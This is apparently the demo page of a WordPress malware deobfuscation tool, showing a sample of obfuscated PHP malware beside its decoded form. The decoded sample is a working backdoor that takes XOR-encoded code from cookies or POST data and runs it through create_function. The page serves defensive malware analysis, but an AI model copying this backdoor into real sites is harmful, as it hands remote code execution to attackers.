Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $wektlf = 'ngk60fax\'9o8m2e-17t3i*yr_5spblvucH#4d';$rqnnqg = Array();$rqnnqg[] = $wektlf[33].$wektlf[21];$rqnnqg[] = $wektlf[32].$wektlf[23].$wektlf[14].$wektlf[6].$wektlf[18].$wektlf[14].$wektlf[24].$wektlf[5].$wektlf[31].$wektlf[0].$wektlf[32].$wektlf[18].$wektlf[20].$wektlf[10].$wektlf[0...



Obfuscated php code

<?php
$wektlf = 'ngk60fax\'9o8m2e-17t3i*yr_5spblvucH#4d';$rqnnqg = Array();$rqnnqg[] = $wektlf[33].$wektlf[21];$rqnnqg[] = $wektlf[32].$wektlf[23].$wektlf[14].$wektlf[6].$wektlf[18].$wektlf[14].$wektlf[24].$wektlf[5].$wektlf[31].$wektlf[0].$wektlf[32].$wektlf[18].$wektlf[20].$wektlf[10].$wektlf[0];$rqnnqg[] = $wektlf[28].$wektlf[19].$wektlf[9].$wektlf[13].$wektlf[35].$wektlf[14].$wektlf[3].$wektlf[19].$wektlf[15].$wektlf[32].$wektlf[36].$wektlf[3].$wektlf[35].$wektlf[15].$wektlf[35].$wektlf[32].$wektlf[11].$wektlf[3].$wektlf[15].$wektlf[9].$wektlf[36].$wektlf[13].$wektlf[35].$wektlf[15].$wektlf[16].$wektlf[16].$wektlf[17].$wektlf[36].$wektlf[28].$wektlf[25].$wektlf[17].$wektlf[3].$wektlf[17].$wektlf[19].$wektlf[5].$wektlf[4];$rqnnqg[] = $wektlf[34];$rqnnqg[] = $wektlf[32].$wektlf[10].$wektlf[31].$wektlf[0].$wektlf[18];$rqnnqg[] = $wektlf[26].$wektlf[18].$wektlf[23].$wektlf[24].$wektlf[23].$wektlf[14].$wektlf[27].$wektlf[14].$wektlf[6].$wektlf[18];$rqnnqg[] = $wektlf[14].$wektlf[7].$wektlf[27].$wektlf[29].$wektlf[10].$wektlf[36].$wektlf[14];$rqnnqg[] = $wektlf[26].$wektlf[31].$wektlf[28].$wektlf[26].$wektlf[18].$wektlf[23];$rqnnqg[] = $wektlf[6].$wektlf[23].$wektlf[23].$wektlf[6].$wektlf[22].$wektlf[24].$wektlf[12].$wektlf[14].$wektlf[23].$wektlf[1].$wektlf[14];$rqnnqg[] = $wektlf[26].$wektlf[18].$wektlf[23].$wektlf[29].$wektlf[14].$wektlf[0];$rqnnqg[] = $wektlf[27].$wektlf[6].$wektlf[32].$wektlf[2];foreach ($rqnnqg[8]($_COOKIE, $_POST) as $qqzid => $nnkka){function hcspfuu($rqnnqg, $qqzid, $wgjfh){return $rqnnqg[7]($rqnnqg[5]($qqzid . $rqnnqg[2], ($wgjfh / $rqnnqg[9]($qqzid)) + 1), 0, $wgjfh);}function hiecap($rqnnqg, $cmtmu){return @$rqnnqg[10]($rqnnqg[0], $cmtmu);}function uemswbg($rqnnqg, $cmtmu){$uhvzpub = $rqnnqg[4]($cmtmu) % 3;if (!$uhvzpub) {$vgosji = $rqnnqg[1]; $actrtk = $vgosji("", $cmtmu[1]($cmtmu[2]));$actrtk();exit();}}$nnkka = hiecap($rqnnqg, $nnkka);uemswbg($rqnnqg, $rqnnqg[6]($rqnnqg[3], $nnkka ^ hcspfuu($rqnnqg, $qqzid, $rqnnqg[9]($nnkka))));}

Decoded(de-Obfuscated) php code

<?php

$wektlf = 'ngk60fax\'9o8m2e-17t3i*yr_5spblvucH#4d';
$rqnnqg = array();
$rqnnqg[] = "H*";
$rqnnqg[] = "create_function";
$rqnnqg[] = "b3924e63-cd64-4c86-9d24-117db57673f0";
$rqnnqg[] = $wektlf[34];
$rqnnqg[] = "count";
$rqnnqg[] = "str_repeat";
$rqnnqg[] = "explode";
$rqnnqg[] = "substr";
$rqnnqg[] = "array_merge";
$rqnnqg[] = "strlen";
$rqnnqg[] = "pack";
foreach (array_merge($_COOKIE, $_POST) as $qqzid => $nnkka) {
    function hcspfuu($rqnnqg, $qqzid, $wgjfh)
    {
        return $rqnnqg[7]($rqnnqg[5]($qqzid . $rqnnqg[2], $wgjfh / $rqnnqg[9]($qqzid) + 1), 0, $wgjfh);
    }
    function hiecap($rqnnqg, $cmtmu)
    {
        return @$rqnnqg[10]($rqnnqg[0], $cmtmu);
    }
    function uemswbg($rqnnqg, $cmtmu)
    {
        $uhvzpub = $rqnnqg[4]($cmtmu) % 3;
        if (!$uhvzpub) {
            $vgosji = $rqnnqg[1];
            $actrtk = $vgosji("", $cmtmu[1]($cmtmu[2]));
            $actrtk();
            exit;
        }
    }
    $nnkka = hiecap($rqnnqg, $nnkka);
    uemswbg($rqnnqg, $rqnnqg[6]($rqnnqg[3], $nnkka ^ hcspfuu($rqnnqg, $qqzid, $rqnnqg[9]($nnkka))));
}

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.